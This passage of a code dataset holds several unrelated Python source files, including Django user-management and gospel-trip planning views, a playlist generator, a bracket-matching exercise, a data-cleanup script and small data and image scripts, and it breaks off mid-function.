user.phone = form.cleaned_data['phone']\n\n            
user.save()\n\n            if form.cleaned_data['password'] != '':\n\n                user.set_password(form.cleaned_data['password'])\n\n\n            user.save()\n\n            # send to event list page\n            return HttpResponseRedirect('/manager/users/')\n\n\n    params['form'] = form\n\n    return templater.render_to_response(request, 'events.edit.html', params)\n\n@view_function\ndef delete(request):\n    '''\n    delete: Deletes selected user\n    '''\n\n    params = {}\n\n    # try and get user\n    try:\n        user = hmod.User.objects.get(id=request.urlparams[0])\n\n    # if user does not exist\n    except hmod.User.DoesNotExist:\n\n        # go back to user list page\n        return HttpResponseRedirect('/manager/users/')\n\n\n    # else, delete user\n    user.delete()\n\n    # return to user list page\n    return HttpResponseRedirect('/manager/users/')\n\n\nclass UserEditForm(forms.Form):\n    '''\n    UserEditForm: Fields to edit user username, password, first_name, last_name, email, phone\n    '''\n    username = forms.CharField(label=\"Username\", required=True, max_length=100)\n    password = forms.CharField(label=\"Password\", required=False, widget = forms.PasswordInput)\n    first_name = forms.CharField(label=\"First Name\",required=True, max_length=100)\n    last_name = forms.CharField(label=\"Last Name\", required=True, max_length=100)\n    email = forms.EmailField(label=\"Email\", required=True, max_length=100)\n    phone = forms.CharField(label=\"Phone\", required=True, max_length=100)\n\n    def clean_username(self):\n        # check if username is unique\n        user = hmod.User.objects.filter(username=self.cleaned_data['username']).exclude(id=self.user_id)\n\n        if user.count() > 0:\n            raise forms.ValidationError('%s already exists' % self.cleaned_data['username'])\n\n        return self.cleaned_data['username']\n","sub_path":"IS 413/INTEX/manager/views/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"47430520","text":"import sqlalchemy\nimport random\nfrom database.Basedonnees_initiation import table_morceaux, connection as conn\nfrom creationfichier.fichier import M3U, XSPF, PLS\n\n#Definition of a variable grouping a set of arguments\nargument_cli = ['titrePlaylist','artistePlaylist','albumPlaylist','genrePlaylist']\n\n#Definition of the playlist\nmusiquePlayList = [] #Playlist tracks\n\n\"\"\"\nFunction that retrieves data from the database according to the user's needs\n:param a: the arguments entered by the user\n\"\"\"\n\ndef recupererDonnees(args):\n    for attribut in argument_cli:\n        if getattr(args, attribut) is not None:\n            for argument in getattr(args, attribut):\n                #Retrieve the data from the database for each argument below\n                if (attribut == 'titrePlaylist'):\n                    RecuperationDonnees = sqlalchemy.select([table_morceaux]).where(table_morceaux.c.titre == argument[0])\n                #Retrieve the data from the database for each argument below\n                if (attribut == 'artistePlaylist'):\n                    RecuperationDonnees = sqlalchemy.select([table_morceaux]).where(table_morceaux.c.artiste == argument[0])\n                #Retrieve the data from the database for each argument below\n                if (attribut == 'albumPlaylist'):\n                    RecuperationDonnees = sqlalchemy.select([table_morceaux]).where(table_morceaux.c.album == argument[0])\n                #Retrieve the data from the database for each argument below\n                if (attribut == 'genrePlaylist'):\n                    RecuperationDonnees = sqlalchemy.select([table_morceaux]).where(table_morceaux.c.genre == argument[0])\n\n                # Connect to the database, then 
execute the query\n                recuperation = conn.execute(RecuperationDonnees)\n                #Insert the retrieved data into a list\n                recuperation = list(recuperation)\n                #Shuffle the tracks in the list\n                random.shuffle(recuperation)\n                \n                \n                argument.insert(2,[]) #Create a list in 3rd position of the arguments e.g.: rock 70 []\n                #Initialize the value to 0\n                i=0 \n                #Initialize the value to 0\n                duree = 0 \n                \n                for champBDD in recuperation: \n                    #For each track retrieved in the list, check the duration to match the user's request as closely as possible\n                    duree += champBDD[5] \n                    #Corresponds to the duration field in the database\n                    if(duree < argument[1]*60): \n                        #If duration is below the user-requested duration (converted to seconds)\n                        argument[2].insert(i, champBDD) #Insert the converted and checked track into the list\n                        i += 1\n                    \n                    else:\n                        duree -= champBDD[5] \n                        #Corresponds to the duration field in the database\n                        \n\"\"\"\nGenerate the playlist\n:param a: the list of arguments entered by the user\n\"\"\"\ndef generationPlaylist(args):\n    i = 0\n    for attribut in argument_cli:\n        if getattr(args, attribut) is not None:\n            for argument in getattr(args, attribut):\n                for musique in argument[2]: # For each track in the playlist, insert the title, artist, album, format and path \n                    musiquePlayList.insert(i, [musique[0], musique[2], musique[1], musique[5], musique[8]])\n                    i += 1\n    random.shuffle(musiquePlayList) #Shuffle the tracks randomly\n    \n\"\"\"\nAll the checks needed to run the program successfully.\n:param a: list of arguments\n\"\"\"\ndef Playlist(args):\n    duree = 0 #initialize to 0\n    for musique in musiquePlayList: #For each track in the playlist for a specific genre\n        duree += musique[3]\n    \n    if(duree < args.dureePlaylist*60): #If the duration is less than the total duration requested by the user, run the query that randomly fetches tracks from the database matching the genre\n        select_morceaux = sqlalchemy.select([table_morceaux])\n        resultat = conn.execute(select_morceaux)\n        resultat = list(resultat)\n        random.shuffle(resultat)\n        \n        i=len(musiquePlayList)\n        for musique in resultat:\n            duree += musique[5] # check that adding a track does not exceed the requested playlist duration; if it fits, insert another random track\n            if(duree < args.dureePlaylist*60):\n                musiquePlayList.insert(i, [musique[0], musique[2], musique[1], musique[5], musique[8]])\n                i += 1\n            else:\n                duree -= musique[5] # Otherwise, remove the track and select a shorter one to fill the playlist with as small a gap as possible\n    return duree\n\n\"\"\"\nHandle writing the file in the 3 supported formats\n:param a: the arguments\n:param b: the playlist tracks\n\"\"\"\ndef EcritureFichier(args, musiquePlayList):\n    if(args.formatPlaylist == 'm3u'):\n        M3U(args, musiquePlayList)\n    if(args.formatPlaylist == 'xspf'):\n        XSPF(args, musiquePlayList)\n    if(args.formatPlaylist == 'pls'):\n        PLS(args, musiquePlayList)\n\n","sub_path":"database/recuperationdonnees.py","file_name":"recuperationdonnees.py","file_ext":"py","file_size_in_byte":5588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"281345206","text":"test_cases = [\n    '()',\n    '(())',\n    '()()',\n    '([])',\n    '([])',\n    '([)]',\n    '{{}()[()]}',\n    '{[]{()}{{{{{{}',\n]\n\n#b_open = ['(', '[', '{']\n#b_close = [')', ']', '}']\n\nbrackets = 
dict()\nbrackets['('] = ')'\nbrackets['['] = ']'\nbrackets['{'] = '}'\n\ndef is_balanced(s: str) -> bool:\n    stack = list()\n    for c in s:\n        if c in brackets.keys():\n            stack.append(c)\n        elif c in brackets.values():\n            if not stack:\n                # a closing bracket with no matching opener\n                return False\n            d = stack.pop()\n            if brackets[d] != c:\n                return False\n    if len(stack):\n        return False\n    return True\n\nfor tst in test_cases:\n    print(\"Test case:\", tst, \"Result:\", is_balanced(tst))","sub_path":"daily/daily_20190513.py","file_name":"daily_20190513.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"566922762","text":"# -*- coding: utf-8 -*-\n\"\"\"Delete TrashedFileNode records whose id still exists as a StoredFileNode,\ni.e. trashed file nodes that have since been restored.\n\n    python -m scripts.delete_restored_trashedfilenodes --dry\n    python -m scripts.delete_restored_trashedfilenodes\n\n\"\"\"\nimport sys\nimport logging\n\nfrom framework.transactions.context import TokuTransaction\nfrom website.app import init_app\nfrom website.files.models.base import TrashedFileNode, StoredFileNode\nfrom scripts import utils as script_utils\n\nlogger = logging.getLogger(__name__)\n\n\ndef main():\n    init_app(routes=False)\n    dry = '--dry' in sys.argv\n    if not dry:\n        script_utils.add_file_logger(logger, __file__)\n    with TokuTransaction():\n        stored = StoredFileNode.find().get_keys()\n        trashed = TrashedFileNode.find().get_keys()\n\n        stored_set = set(stored)\n        trashed_set = set(trashed)\n\n        intersection = trashed_set & stored_set\n\n        print('There are {} restored trashed file nodes'.format(len(intersection)))\n\n        for trash_id in intersection:\n            TrashedFileNode.remove_one(trash_id)\n            print('Removed TrashedFileNode {}'.format(trash_id))\n\n        if dry:\n            raise RuntimeError('Dry run - rolling back transaction')\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"scripts/delete_restored_trashedfilenodes.py","file_name":"delete_restored_trashedfilenodes.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"397061460","text":"import numpy, csv, time\nfrom scikits.learn.datasets.misc import dumpvar\n\n\nf = open('01423000.dly', 'r')\nreader = csv.reader(f)\nreader.dialect.delimiter='\\t'\n\nn_comments = 28\nfor i in range(n_comments):\n\treader.next()\n\nLABELS = ['agency', 'station', 'date', 'discharge', 'code']\n\ntable = numpy.array([a for a in reader])\n\nAGENCY, STATION, DATE, DISCHARGE, CODE = table.transpose()\n\n# Write the data in nwis.py\na = open(\"../nwis.py\", \"w\")\na.write('# Autogenerated by convert.py at %s\\n\\n' % \n        time.strftime(\"%a, %d %b %Y %H:%M:%S +0000\", time.gmtime()))\n\nfor i in range(2,5):\n\ta.writelines(dumpvar(list(table[:,i]), LABELS[i]))\na.close()\n","sub_path":"scikits/learn/datasets/nwis/src/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"155856419","text":"import cv2\r\nimport random\r\n\r\nimg = cv2.imread('n2.jpg')\r\nshape = img.shape\r\nheight = shape[0] / 7\r\nwidth = shape[1] / 7\r\n\r\nfor j in range (1, 8):\r\n    j_start = int(height * (j-1))\r\n    j_end = int(height * j)\r\n    \r\n    if j % 2 == 0: #left to right for even numbered row\r\n        start = 1\r\n        end = 8\r\n        step = 1\r\n    elif j % 2 != 0: #right to left for odd numbered row\r\n        start = 7\r\n        end = 0\r\n        step = -1\r\n\r\n    for i in range (start, end, step):\r\n        i_start = 
int(width * (i-1))\r\n i_end = int(width * i)\r\n \r\n img = cv2.imread('n2.jpg')\r\n\r\n img [ j_start:j_end, i_start:i_end ] = (random.randint (0, 255), random.randint (0, 255), random.randint (0, 255))\r\n\r\n cv2.imshow ('Frame', img)\r\n cv2.waitKey(500)\r\n\r\n\r\n","sub_path":"Assignment 3/Q3.py","file_name":"Q3.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"458862875","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport collections\nimport json\nimport re\n\nfrom accounts.models import Trainee\nfrom aputils.decorators import group_required\nfrom aputils.trainee_utils import is_trainee, trainee_from_user\nfrom braces.views import GroupRequiredMixin\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.urlresolvers import reverse\nfrom django.db.models import Q, Case, When\nfrom django.http import HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic.base import TemplateView\nfrom django.views.generic.edit import CreateView\n\nfrom .constants import DESTINATION_FIELDS\nfrom .forms import (AnswerForm, GospelTripForm, LocalImageForm, NonTraineeForm,\n SectionFormSet)\nfrom .models import (Answer, Destination, GospelTrip, NonTrainee, Question,\n Section)\nfrom .nontrainee import ApplicationForm, FlightFormSet, PassportForm\nfrom .utils import (export_to_json, get_airline_codes, get_airport_codes,\n import_from_json, section_order_validator)\n\n\nclass GospelTripView(GroupRequiredMixin, CreateView):\n model = GospelTrip\n template_name = 'gospel_trips/gospel_trips_admin.html'\n form_class = GospelTripForm\n group_required = ['training_assistant']\n\n def get_context_data(self, **kwargs):\n ctx = super(GospelTripView, self).get_context_data(**kwargs)\n ctx['gospel_trips'] = GospelTrip.objects.order_by('-open_time')\n ctx['page_title'] = 'Gospel Trip Admin'\n return ctx\n\n\n@group_required(['training_assistant'])\ndef gospel_trip_admin_update(request, pk):\n gt = get_object_or_404(GospelTrip, pk=pk)\n context = {'page_title': 'Gospel Trip Editor'}\n data = request.POST\n\n if request.method == \"POST\":\n form_set = SectionFormSet(data, instance=gt)\n form = GospelTripForm(data, instance=gt)\n\n if form.is_valid() and form_set.is_valid():\n form.save()\n form_set.save()\n\n gt_u = GospelTrip.objects.get(pk=pk)\n nk = gt_u.section_set.last().pk\n gt_u.set_section_order(section_order_validator(data, nk))\n return HttpResponseRedirect(\"\")\n else:\n context['section_formset'] = form_set\n context['gt_form'] = form\n else:\n context['section_formset'] = SectionFormSet(instance=gt)\n context['gt_form'] = GospelTripForm(instance=gt)\n return render(request, 'gospel_trips/gospel_trips_admin_update.html', context=context)\n\n\n@group_required(['training_assistant'])\ndef gospel_trip_admin_delete(request, pk):\n gt = get_object_or_404(GospelTrip, pk=pk)\n if request.is_ajax and request.method == \"DELETE\":\n gt.delete()\n return JsonResponse({'success': True})\n\n\n@group_required(['training_assistant'])\ndef gospel_trip_admin_duplicate(request, pk):\n gt = get_object_or_404(GospelTrip, pk=pk)\n path = export_to_json(gt)\n import_from_json(path)\n return redirect('gospel_trips:admin-create')\n\n\ndef gospel_trip_base(request):\n admin_pk = next((gt.pk for gt in GospelTrip.objects.order_by('-open_time') if gt.is_open), 
0)\n if admin_pk: # is_open is True\n return HttpResponseRedirect(reverse('gospel_trips:gospel-trip', kwargs={'pk': admin_pk}))\n else:\n admin_pk = next((gt.pk for gt in GospelTrip.objects.order_by('-open_time') if gt.keep_open), 0)\n if admin_pk: # keep_open is True\n return HttpResponseRedirect(reverse('gospel_trips:gospel-trip', kwargs={'pk': admin_pk}))\n return HttpResponseRedirect(\"/\")\n\n\ndef rosters_base(request):\n admin_pk = next((gt.pk for gt in GospelTrip.objects.order_by('-open_time') if gt.show_teams), 0)\n if admin_pk: # is_open is True\n return HttpResponseRedirect(reverse('gospel_trips:rosters-all', kwargs={'pk': admin_pk}))\n return HttpResponseRedirect(\"/\")\n\n\ndef gospel_trip_trainee(request, pk):\n gt = get_object_or_404(GospelTrip, pk=pk)\n context = {'page_title': gt.name}\n\n if is_trainee(request.user):\n trainee = trainee_from_user(request.user)\n else:\n context['preview_trainees'] = Trainee.objects.all()\n trainee = Trainee.objects.get(id=request.GET.get('trainee', Trainee.objects.first().id))\n context['selected_trainee'] = trainee\n\n section_qs = Section.objects.filter(Q(gospel_trip=gt) & ~Q(show='HIDE'))\n question_qs = Question.objects.filter(Q(section__in=section_qs) & ~Q(answer_type=\"None\"))\n answer_forms = []\n if request.method == \"POST\":\n for q in question_qs:\n answer = Answer.objects.get_or_create(trainee=trainee, gospel_trip=gt, question=q)[0]\n answer_forms.append(\n AnswerForm(request.POST, prefix=q.id, instance=answer, gospel_trip__pk=pk)\n )\n if all(f.is_valid() for f in answer_forms):\n for f in answer_forms:\n answer = f.save(commit=False)\n answer.gospel_trip = gt\n answer.trainee = trainee\n answer.question = Question.objects.get(id=f.prefix)\n answer.save()\n return HttpResponseRedirect(pk)\n else:\n context['answer_forms'] = answer_forms\n else:\n for q in question_qs:\n answer = Answer.objects.get_or_create(trainee=trainee, gospel_trip=gt, question=q)[0]\n answer_forms.append(AnswerForm(prefix=q.id, instance=answer, gospel_trip__pk=pk))\n context['answer_forms'] = answer_forms\n\n context['section_qs'] = section_qs\n context['pk'] = gt.id\n context['AIRPORT_CODES'] = json.dumps(get_airport_codes())\n context['AIRLINE_CODES'] = json.dumps(get_airline_codes())\n return render(request, 'gospel_trips/gospel_trips.html', context=context)\n\n\nclass NonTraineeView(GroupRequiredMixin, TemplateView):\n template_name = 'gospel_trips/nontrainee_form.html'\n group_required = ['training_assistant']\n\n def post(self, request, *args, **kwargs):\n gt = get_object_or_404(GospelTrip, pk=self.kwargs['pk'])\n data = request.POST\n application_form = ApplicationForm(data, gospel_trip__pk=gt.pk)\n passport_form = PassportForm(data)\n flight_formset = FlightFormSet(data)\n\n ntpk = self.kwargs.get('ntpk', None)\n if ntpk:\n nt = get_object_or_404(NonTrainee, pk=ntpk)\n nontrainees_form = NonTraineeForm(instance=nt, data=data)\n else:\n nontrainees_form = NonTraineeForm(data=data)\n\n if nontrainees_form.is_valid():\n non_trainee = nontrainees_form.save(commit=False)\n non_trainee.gospel_trip = gt\n forms = [application_form, passport_form, flight_formset]\n if all(f.is_valid() for f in forms):\n d = {'application': application_form.cleaned_data}\n d['passport'] = passport_form.cleaned_data\n d['flights'] = []\n for f in flight_formset:\n if f.cleaned_data and f.cleaned_data['flight_type']:\n d['flights'].append(f.cleaned_data)\n non_trainee.application_data = d\n non_trainee.save()\n\n context = self.get_context_data()\n return 
super(NonTraineeView, self).render_to_response(context)\n\n def get_context_data(self, **kwargs):\n ctx = super(NonTraineeView, self).get_context_data(**kwargs)\n gt = get_object_or_404(GospelTrip, pk=self.kwargs['pk'])\n ntpk = self.kwargs.get('ntpk', None)\n if ntpk:\n nt = get_object_or_404(NonTrainee, pk=ntpk)\n data = nt.application_data\n ctx['application_form'] = ApplicationForm(initial=eval(data.get('application', '{}')), gospel_trip__pk=gt.pk)\n ctx['nontrainee_form'] = NonTraineeForm(instance=nt)\n ctx['passport_form'] = PassportForm(initial=eval(data.get('passport', '{}')))\n ctx['flight_formset'] = FlightFormSet(initial=eval(data.get('flights', '{}')))\n else:\n ctx['application_form'] = ApplicationForm(gospel_trip__pk=gt.pk)\n ctx['nontrainee_form'] = NonTraineeForm()\n ctx['passport_form'] = PassportForm()\n ctx['flight_formset'] = FlightFormSet()\n ctx['nontrainees'] = NonTrainee.objects.filter(gospel_trip=gt)\n return ctx\n\n\nclass NonTraineeReportView(GroupRequiredMixin, TemplateView):\n template_name = 'gospel_trips/non_trainee_report.html'\n group_required = ['training_assistant']\n\n def get_context_data(self, **kwargs):\n ctx = super(NonTraineeReportView, self).get_context_data(**kwargs)\n gt = get_object_or_404(GospelTrip, pk=self.kwargs['pk'])\n nontrainees = NonTrainee.objects.filter(gospel_trip=gt)\n decoder = json.JSONDecoder(object_pairs_hook=collections.OrderedDict)\n for ntr in nontrainees:\n data = ntr.application_data\n app_data = eval(data.get('application', '{}'))\n d = decoder.decode(json.dumps(app_data))\n for k, v in d.items():\n if 'destination' in k and bool(v):\n d[k] = Destination.objects.get(pk=v).name\n\n ntr.application = d\n passport_data = eval(data.get('passport', \"{}\"))\n ntr.passport = decoder.decode(json.dumps(passport_data))\n flight_data = eval(data.get('flights', '{}'))\n ntr.flights = decoder.decode(json.dumps(flight_data))\n ctx['nontrainees'] = nontrainees\n return ctx\n\n\nclass GospelTripReportView(GroupRequiredMixin, TemplateView):\n template_name = 'gospel_trips/gospel_trip_report.html'\n group_required = ['training_assistant']\n\n @staticmethod\n def get_trainee_dict(gospel_trip, question_qs, general_items):\n data = []\n prefetch = ['trainees']\n prefetch.extend([item for item in general_items if item in DESTINATION_FIELDS])\n destination_qs = Destination.objects.filter(gospel_trip=gospel_trip).prefetch_related(*prefetch)\n\n contacts = f_coords = m_coords = s_coords = []\n if 'trainee_contacts' in general_items:\n contacts = destination_qs.values_list('trainee_contacts', flat=True)\n if 'finance_coords' in general_items:\n f_coords = destination_qs.values_list('finance_coords', flat=True)\n if 'media_coords' in general_items:\n m_coords = destination_qs.values_list('media_coords', flat=True)\n if 'stat_coords' in general_items:\n s_coords = destination_qs.values_list('stat_coords', flat=True)\n\n destination_names = destination_qs.values('name')\n get_these_trainees = Trainee.objects.filter(Q(id__in=gospel_trip.get_submitted_trainees()))\n for t in get_these_trainees:\n ID = t.id\n entry = {\n 'name': t.full_name,\n 'id': ID,\n 'destination': destination_qs.filter(trainees=t).first(),\n 'responses': []}\n responses = question_qs.filter(answer__trainee=t).values('answer_type', 'answer__response')\n for r in responses:\n if r['answer_type'] == 'destinations' and r['answer__response']:\n try:\n r['answer__response'] = destination_names.get(id=r['answer__response'])['name']\n except ObjectDoesNotExist:\n r['answer__response'] = 
\"Destination Does Not Exist\"\n entry['responses'] = responses\n\n if general_items:\n if contacts:\n entry['trainee_contacts'] = \"Yes\" if ID in contacts else \"\"\n if f_coords:\n entry['finance_coords'] = \"Yes\" if ID in f_coords else \"\"\n if m_coords:\n entry['media_coords'] = \"Yes\" if ID in m_coords else \"\"\n if s_coords:\n entry['stat_coords'] = \"Yes\" if ID in s_coords else \"\"\n if 'term' in general_items:\n entry['term'] = t.current_term\n if 'gender' in general_items:\n entry['gender'] = t.gender\n if 'birthdate' in general_items:\n entry['birthdate'] = t.date_of_birth\n if 'email' in general_items:\n entry['email'] = t.email\n if 'locality' in general_items:\n entry['locality'] = t.locality\n if 'phone' in general_items:\n entry['phone'] = t.meta.phone\n data.append(entry)\n return data\n\n def get_context_data(self, **kwargs):\n ctx = super(GospelTripReportView, self).get_context_data(**kwargs)\n gt = GospelTrip.objects.get(pk=self.kwargs['pk'])\n question_qs = Question.objects.filter(section__gospel_trip=gt).exclude(answer_type=\"None\")\n sections_to_show = Section.objects.filter(id__in=question_qs.values_list('section'))\n\n questions = self.request.GET.getlist('questions', [0])\n preserved = Case(*[When(pk=pk, then=pos) for pos, pk in enumerate(questions)])\n question_qs = question_qs.filter(id__in=questions).order_by(preserved)\n\n general = self.request.GET.getlist('general', [])\n\n general_options = collections.OrderedDict([\n ('trainee_contacts', 'Trainee Contact'),\n ('finance_coords', 'Finance Coord'),\n ('media_coords', 'Media Coord'),\n ('stat_coords', 'Stats Coord'),\n ('term', 'Term'),\n ('gender', 'Gender'),\n ('locality', 'Locality'),\n ('phone', 'Phone'),\n ('email', 'Email'),\n ('birthdate', 'Birthdate')\n\n ])\n\n ctx['questions'] = question_qs\n ctx['chosen'] = question_qs.values_list('id', flat=True)\n ctx['chosen_general'] = general\n ctx['general_options'] = general_options\n ctx['sections'] = sections_to_show\n ctx['trainees'] = self.get_trainee_dict(gt, question_qs, general)\n ctx['page_title'] = 'Gospel Trip Response Report'\n return ctx\n\n\nclass DestinationEditorView(GroupRequiredMixin, TemplateView):\n template_name = 'gospel_trips/destination_editor.html'\n group_required = ['training_assistant']\n\n def get_context_data(self, **kwargs):\n context = super(DestinationEditorView, self).get_context_data(**kwargs)\n gt = get_object_or_404(GospelTrip, pk=self.kwargs['pk'])\n context['page_title'] = 'Destination Editor'\n context['destinations'] = Destination.objects.filter(gospel_trip=gt)\n return context\n\n\nclass DestinationByPreferenceView(GroupRequiredMixin, TemplateView):\n template_name = 'gospel_trips/by_preference.html'\n group_required = ['training_assistant']\n\n @staticmethod\n def get_trainee_dict(gospel_trip):\n data = []\n destination_qs = Destination.objects.filter(gospel_trip=gospel_trip).prefetch_related(*DESTINATION_FIELDS)\n dest_dict = destination_qs.values('id', 'name', 'trainee_contacts')\n contacts = destination_qs.values_list('trainee_contacts', flat=True)\n f_coords = destination_qs.values_list('finance_coords', flat=True)\n m_coords = destination_qs.values_list('media_coords', flat=True)\n s_coords = destination_qs.values_list('stat_coords', flat=True)\n qs = Trainee.objects.filter(id__in=gospel_trip.get_submitted_trainees()).select_related('locality__city').prefetch_related('trainee_contacts', 'destination')\n all_answers = gospel_trip.answer_set.filter(question__label__startswith='Destination 
Preference').values('response', 'question__label')\n for t in qs:\n ID = t.id\n answer_set = all_answers.filter(trainee=t)\n data.append({\n 'id': ID,\n 'name': t.full_name,\n 'term': t.current_term,\n 'locality': t.locality.city.name,\n 'destination': 0,\n 'trainee_contact': ID in contacts,\n 'finance_coord': ID in f_coords,\n 'media_coord': ID in m_coords,\n 'stat_coord': ID in s_coords\n })\n dest = dest_dict.filter(trainees__in=[t])\n if dest.exists():\n data[-1]['destination'] = dest.first()['id']\n for a in answer_set:\n if re.match(r'^Destination Preference \\d+$', a['question__label']): # returns None if no match\n if a['response']:\n key = \"preference_\" + a['question__label'].split(\" \")[-1]\n try:\n data[-1][key] = dest_dict.get(id=a['response'])['name']\n except ObjectDoesNotExist:\n data[-1][key] = \"Destination Does Not Exist\"\n\n return data\n\n def get_context_data(self, **kwargs):\n context = super(DestinationByPreferenceView, self).get_context_data(**kwargs)\n gt = get_object_or_404(GospelTrip, pk=self.kwargs['pk'])\n dest_choices = [{'id': 0, 'name': ''}]\n dest_choices.extend([d for d in Destination.objects.filter(gospel_trip=gt).values('id', 'name')])\n context['destinations'] = dest_choices\n context['by_preference'] = self.get_trainee_dict(gt)\n context['page_title'] = 'Destination By Preference'\n return context\n\n\nclass DestinationByGroupView(GroupRequiredMixin, TemplateView):\n template_name = 'gospel_trips/by_group.html'\n group_required = ['training_assistant']\n\n def post(self, request, *args, **kwargs):\n trainee_ids = request.POST.getlist('choose_trainees', [])\n dest_id = request.POST.get('destination', 0)\n if dest_id:\n dest = Destination.objects.get(id=dest_id)\n new_set = Trainee.objects.filter(id__in=trainee_ids)\n dest.trainees.set(new_set)\n dest.save()\n context = self.get_context_data()\n return super(DestinationByGroupView, self).render_to_response(context)\n\n def get_context_data(self, **kwargs):\n context = super(DestinationByGroupView, self).get_context_data(**kwargs)\n gt = get_object_or_404(GospelTrip, pk=self.kwargs['pk'])\n all_destinations = Destination.objects.filter(gospel_trip=gt)\n if all_destinations.exists():\n if self.request.method == 'POST':\n destination = self.request.POST.get('destination', all_destinations.first().id)\n else:\n destination = self.request.GET.get('destination', all_destinations.first().id)\n dest = Destination.objects.get(id=destination)\n to_exclude = all_destinations.filter(~Q(trainees=None), ~Q(id=dest.id))\n context['chosen'] = dest.trainees.values_list('id', flat=True)\n context['choose_from'] = Trainee.objects.filter(id__in=gt.get_submitted_trainees()).exclude(id__in=to_exclude.values_list('trainees__id'))\n context['unassigned'] = Trainee.objects.filter(id__in=gt.get_submitted_trainees()).filter(Q(destination=None))\n if 'destinit' not in context:\n context['destinit'] = dest.id\n context['all_destinations'] = all_destinations\n else:\n context['no_destinations'] = True\n\n context['page_title'] = 'Destination By Group'\n context['post_url'] = reverse('gospel_trips:by-group', kwargs={'pk': gt.id})\n return context\n\n\nclass RostersAllTeamsView(TemplateView):\n template_name = 'gospel_trips/rosters_all_teams.html'\n\n @staticmethod\n def get_trainee_dict(gospel_trip, destination_qs):\n data = []\n contacts = destination_qs.values_list('trainee_contacts', flat=True)\n for t in Trainee.objects.filter(id__in=gospel_trip.get_submitted_trainees()):\n data.append({\n 'name': t.full_name,\n 'id': t.id,\n 
'trainee_contact': t.id in contacts,\n 'destination': destination_qs.filter(trainees=t).first()\n })\n return data\n\n def get_context_data(self, **kwargs):\n context = super(RostersAllTeamsView, self).get_context_data(**kwargs)\n gt = get_object_or_404(GospelTrip, pk=self.kwargs['pk'])\n all_destinations = Destination.objects.filter(gospel_trip=gt)\n if is_trainee(self.request.user) and all_destinations.filter(trainees=self.request.user).exists():\n context['destination'] = all_destinations.get(trainees=self.request.user)\n context['page_title'] = context['destination'].name\n if self.request.user.has_group(['training_assistant']):\n context['trainees'] = self.get_trainee_dict(gt, all_destinations)\n context['page_title'] = \"Rosters: All Teams\"\n return context\n\n\nclass RostersIndividualTeamView(GroupRequiredMixin, TemplateView):\n template_name = 'gospel_trips/rosters_individual_team.html'\n group_required = ['training_assistant']\n\n def get_context_data(self, **kwargs):\n context = super(RostersIndividualTeamView, self).get_context_data(**kwargs)\n gt = get_object_or_404(GospelTrip, pk=self.kwargs['pk'])\n all_destinations = Destination.objects.filter(gospel_trip=gt)\n destinations = self.request.GET.getlist('destinations', [])\n chosen_destinations = all_destinations.filter(id__in=destinations)\n context['all_destinations'] = all_destinations\n context['destinations'] = chosen_destinations\n context['chosen'] = chosen_destinations.values_list('id', flat=True)\n context['page_title'] = \"Rosters: Individual Teams\"\n return context\n\n\n@group_required(['training_assistant'])\ndef destination_add(request, pk):\n gt = get_object_or_404(GospelTrip, pk=pk)\n if request.method == \"POST\":\n name = request.POST.get('destination_name', None)\n if name:\n Destination.objects.get_or_create(gospel_trip=gt, name=name)\n return redirect('gospel_trips:destination-editor', pk=pk)\n\n\n@group_required(['training_assistant'])\ndef destination_remove(request, pk):\n get_object_or_404(GospelTrip, pk=pk)\n if request.method == \"POST\":\n destinations = request.POST.getlist('destinations', [])\n if destinations:\n to_remove = Destination.objects.filter(id__in=destinations)\n to_remove.delete()\n return redirect('gospel_trips:destination-editor', pk=pk)\n\n\n@group_required(['training_assistant'])\ndef destination_edit(request, pk):\n get_object_or_404(GospelTrip, pk=pk)\n if request.method == \"POST\":\n destination = request.POST.get('destination', None)\n name = request.POST.get('destination_edit', None)\n if name and destination:\n obj = get_object_or_404(Destination, pk=destination)\n obj.name = name\n obj.save()\n return redirect('gospel_trips:destination-editor', pk=pk)\n\n\n@group_required(['training_assistant'])\ndef assign_destination(request, pk):\n if request.is_ajax() and request.method == \"POST\":\n dest_id = request.POST.get('destination_id', 0)\n trainee_id = request.POST.get('trainee_id', 0)\n is_contact = request.POST.get('is_contact', 'false') == 'true'\n try:\n tr = Trainee.objects.get(id=trainee_id)\n gt = GospelTrip.objects.get(id=pk)\n old_dests = tr.destination.filter(gospel_trip=gt)\n if old_dests.exists():\n # Even if dest_id is 0, trainee is still removed\n old_dest = old_dests.first()\n old_dest.remove_trainee(tr)\n new_dest = Destination.objects.get(id=dest_id)\n new_dest.trainees.add(tr)\n new_dest.save()\n new_dest.set_trainee_as(tr, 'trainee_contacts',set_to=is_contact)\n return JsonResponse({'success': True})\n except ObjectDoesNotExist:\n return 
